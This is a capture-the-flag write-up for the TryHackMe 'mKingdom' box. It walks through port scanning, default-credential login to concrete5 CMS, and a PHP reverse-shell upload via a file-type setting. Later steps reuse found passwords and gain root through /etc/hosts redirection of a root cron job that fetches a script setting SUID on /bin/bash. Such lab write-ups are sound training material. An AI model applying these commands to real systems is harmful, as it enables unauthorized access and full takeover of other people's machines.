mKingdom

Beginner-friendly box inspired by a certain mustache man.

LogomKingdomTryHackMe

Recon

RustScan

We begin by performing a port scan using RustScan, which reveals that only port 85 is open.

rustscan --ulimit 5000 --range 1-65535 -a machine_ip
RustScan results: Only port 85 detected as open.

Let's open this port in a web browser, as it might be running an HTTP service.

Accessing port 85 in the browser: Checking for HTTP service.

Since the page appears nothing, let's proceed with content discovery using the ffuf tool.

ffuf -u http://machine_ip:85/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 100
Exploring content with FFUF tool

Let's investigate the contents of the "app" page to see what it contains.

Examining the contents of the 'app' page for clues

Inside, we find a button with JavaScript code designed to navigate us to the 'castle' page.

    <script>
        function buttonClick() {
            alert("Make yourself confortable and enjoy my place.");
            window.location.href = 'castle';
        }
    </script>

Upon accessing the castle page, we encounter a webpage titled "Toad's website."

Exploring 'Toad's website' after accessing the castle page.\

Upon inspecting the webpage's source code, it appears to be running concrete5 CMS version 8.5.2.

Identifying concrete5 CMS version 8.5.2 from webpage source code.

After researching online for an exploit related to this version, I came across a HackerOne report that could be useful.

LogoConcrete CMS disclosed on HackerOne: Remote Code Execution (Reverse...HackerOne
HackerOne Report .

The report indicates that administrator permissions are required. Now, let's find a way to access the login page and obtain administrator privileges. If we scroll down on Toad's page, we notice a small text that says 'Log in', which might be a button to access the login page.

Spotting the 'Log in' option on Toad's page, potentially leading to the login interface.

Once we access the login page, we can attempt default credentials.

Exploring default credentials upon entering the login page.

Hooray! It's working!

administrator page

Shell as www-data

Now that we have administrator access, let's execute the exploit from the HackerOne report.

Steps To Reproduce

  1. Access the "System & Settings" option.

  2. Next, navigate to "Allowed File Types" under the Files section.

  3. Set the "File Extensions to Accept" field to only allow "php".

  4. Click on the Save button.

  5. Once saved, now visit the File Manager to upload the PHP shell.

Personally, I use the Firefox extension Hack-Tools to generate my PHP reverse shell.

LogoHackTools – Get this Extension for 🦊 Firefox (en-US)mozamo
Hack-Tools extension

Alternatively, you can utilize Pentestmonkey's PHP reverse shell.

  1. Upload your reverse shell file.

  2. After uploading the PHP reverse shell, simply click on "Close".

  3. Upon successful upload, you'll receive a completion message with the URL from which you can exploit the shell.

  4. Before visiting the page, make sure to set up a netcat listener on the port specified in the PHP reverse shell.

That's it! Now we have a reverse shell as the www-data user!

Reverse Shell as www-data

Shell as toad

Before obtaining a shell as "toad," let's Upgrade the shell using this command:

export TERM=xterm-256color;python3 -c "import pty;pty.spawn(\"/bin/bash\")"
Upgrading the shell

Now, we need to run linpeas.sh to search for any privilege escalation opportunities.

linPASE banner

you can get the linpase script by this command:

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -O

We've discovered a password that may belong to 'toad'.

toad's password

Hooray! We've successfully accessed the 'toad' user account.

Shell as mario

After searching for some time for anything related to exploiting the 'mario' user, we came across a strange encoded string in .bashrc of toad's user.

strange base64 in .bashrc

After decoding it, we obtained some sort of password.

decoding the base64

It might be Mario's password let's give it a try!

Testing the decoded string as a potential password for Mario.

Wow, it worked! We now have access as the Mario user and we can get the user.txt flag.

what?! ..

Wait, why can't we 'cat' the user.txt? Oh, I see why—because it's set with SUID permissions and Toad doesn't have access to it!

Soloution

We can use these commands to display the contents of the user.txt file. 

more
less
tail
head
vim
nano
nl
tac

Shell as root

After some searching, we discovered that we can modify the /etc/hosts file. But how could this be useful?

Let's run the pspy64 tool to check if there are any visible cron job commands.

LogoGitHub - DominicBreuker/pspy: Monitor linux processes without root permissionsGitHub
tool's github

we see that the root run a bash script from the website

We've observed that the user root is executing a bash script from the website.

We can modify the /etc/hosts file to redirect the IP address of mkingdom.thm to our IP, enabling us to exploit this for a root shell.

First, execute this command.

echo 'machine_ip mkingdom.thm' > /etc/hosts

Next, run this command to get the path requested by root.

cd /tmp ; mkdir -p ./app/castle/application

Also, execute this command to get the root request.

python3 -m http.server 85

If you observe the requests, you're on the right track.

Next, proceed to run this command.

echo "chmod 4777 /bin/bash" > counter.sh

If you find the root request in the Python logs, you can exploit root access using this command.

bash -p
root.txt flag

PreviousAirplane

Last updated

Was this helpful?